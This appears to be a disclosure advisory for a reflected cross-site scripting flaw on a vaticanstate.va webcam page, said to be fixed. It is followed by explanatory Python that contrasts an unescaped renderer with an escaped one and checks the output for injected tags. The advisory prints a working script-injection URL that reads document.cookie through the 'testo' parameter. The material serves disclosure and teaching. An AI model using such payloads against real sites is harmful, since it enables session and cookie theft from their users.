* vaticanstate.va XSS Vulnerability webcam page *
========================================================
*
* Site: http://www.vaticanstate.va/IT/Monumenti/webcam/index?cam=webcam3
* Discovered by: Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==)
* Follow me: http://www.linkedin.com/in/andreamenin
*
========================================================

Report-Timeline:
----------------
2011-03-07: Notification to vaticanstate.va
2013-06-30: Fixed, but no answer received.

Description:
------------
The vulnerability was in the webcam page "page/index?cam=webcam[0-9]" and was triggered by sending an HTTP GET request with the variable "testo" containing JavaScript or HTML code.

Example (url-decoded):
http://www.vaticanstate.va/IT/Monumenti/webcam/index?cam=webcam3&testo=

XSS URL (now fixed):
--------------------
http://www.vaticanstate.va/IT/Monumenti/webcam/index?cam=webcam3&testo=%3C%2Fspan%3E%3C%2Fdiv%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

Screenshot XSS Vulnerability before fix:
----------------------------------------
http://goo.gl/Jv8XJ

CREDITS:
---------
This vulnerability was discovered by Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==)

LEGAL NOTICES:
---------------
The Author accepts no responsibility for any damage caused by the use or misuse of this information.
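The defect class behind this advisory is a query parameter reflected into HTML without output encoding. The following is an added example, not code from the advisory or from the vaticanstate.va site: the server-side template the site used is unknown, so the two `render_*` functions below are hypothetical stand-ins for a caption renderer, the markup they emit is constructed, and the only input is the `testo` value parsed from the advisory's own URL. The `unexpected_tags` helper shows a simple check a developer or tester can run on rendered output to confirm that a reflected parameter can no longer introduce elements.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# The fixed URL quoted in the advisory (its "testo" value is percent-encoded).
ADVISORY_URL = (
    "http://www.vaticanstate.va/IT/Monumenti/webcam/index?cam=webcam3"
    "&testo=%3C%2Fspan%3E%3C%2Fdiv%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E"
)

# Constructed: the only elements the caption template is expected to emit.
ALLOWED_TAGS = {"div", "span"}


def get_testo(url: str) -> str:
    """Return the decoded 'testo' query parameter, or '' if absent."""
    query = parse_qs(urlsplit(url).query)
    return query.get("testo", [""])[0]


def render_vulnerable(testo: str) -> str:
    """Hypothetical 'before' renderer: the parameter is pasted into markup verbatim.

    This is the behaviour the advisory describes; a value containing '<' or '>'
    is interpreted as HTML by the browser instead of being shown as text.
    """
    return f'<div class="webcam"><span class="caption">{testo}</span></div>'


def render_fixed(testo: str) -> str:
    """Hypothetical 'after' renderer: the parameter is HTML-entity encoded.

    html.escape(quote=True) rewrites & < > " and ' so the value is always
    text inside the element body and can never open or close a tag.
    """
    return f'<div class="webcam"><span class="caption">{escape(testo, quote=True)}</span></div>'


class _TagCollector(HTMLParser):
    """Collects every start tag the browser would see in a fragment."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def unexpected_tags(fragment: str) -> list[str]:
    """Return start tags in the rendered fragment that the template never emits itself.

    A non-empty result means user input was able to create elements,
    i.e. the output is still reflecting markup.
    """
    parser = _TagCollector()
    parser.feed(fragment)
    return [t for t in parser.tags if t not in ALLOWED_TAGS]


if __name__ == "__main__":
    testo = get_testo(ADVISORY_URL)
    print("vulnerable renderer, unexpected tags:", unexpected_tags(render_vulnerable(testo)))
    print("fixed renderer, unexpected tags:     ", unexpected_tags(render_fixed(testo)))
```

`html.escape` is the right encoding for the element-body context the advisory's `<span>` represents; a value placed inside an attribute, a `<script>` block or a URL needs the encoding for that context instead, and real template engines (Jinja2 with autoescape, for instance) apply it automatically rather than relying on every call site remembering to.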